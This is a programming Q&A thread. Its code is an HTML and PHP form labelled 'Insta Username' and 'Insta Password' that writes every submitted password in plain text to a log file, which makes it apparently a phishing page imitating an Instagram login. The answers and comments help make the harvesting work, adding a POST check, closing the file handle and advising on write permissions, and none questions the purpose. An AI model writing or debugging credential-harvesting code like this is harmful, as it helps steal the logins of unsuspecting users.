# Redirect after clicking a button and then run a PHP script on the same site

Tags: php, html, forms, redirect, button

I am trying to make a log for my login site but I cant get the PHP below it to run properly.

The code:

```
<form method="POST" name="submit" align="center">
    Insta Username: <input type="text" name="user">
    <p>Insta Password: <input type="password" name="pass" action="error.html">
    </p>
    <button>Submit</button>
</form>

<?php
$ussern = $_POST['user'];
$passw = $_POST['pass'];
$fp = fopen('log.txt', 'a');
fwrite($fp, "[Username: ".$ussern."] [Password: ".$passw."]".PHP_EOL);
?>
```

The problem is that with this input

[image: input]

I get this output

[image: output]

Answer (score 0):

Update these lines it may work

```
<form action="" method="POST" name="submit" align="center">
<button type="submit"></button>
```

Answer (score 0):

This must be because you didn't checked for whether the code is running when you are serving **GET** request or **POST** request. Plus you don't have action field in the form tag and a submit button. May be this will work.

```
<form method="POST" name="submit" align="center" action="">
Insta Username: <input type="text" name="user">
<p>Insta Password: <input type="password" name="pass" action="error.html"> 
</p> 
<button type="submit">Submit</button>
</form>
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $ussern = $_POST['user'];
    $passw = $_POST['pass'];
    $fp = fopen('log.txt', 'a');
    fwrite($fp, "[Username: ".$ussern."] [Password: ".$passw."]".PHP_EOL);
    fclose($fp);
}
?>
```

Comment: this worked... sort of, I got the login to go to my log, but after that nothing at all goes to my log after clicking the button.

Comment: Do you have the necessary write permission to the directory? Try deleting the log.txt and check if it gets created again or not.Also it is a good practice to close the file handle.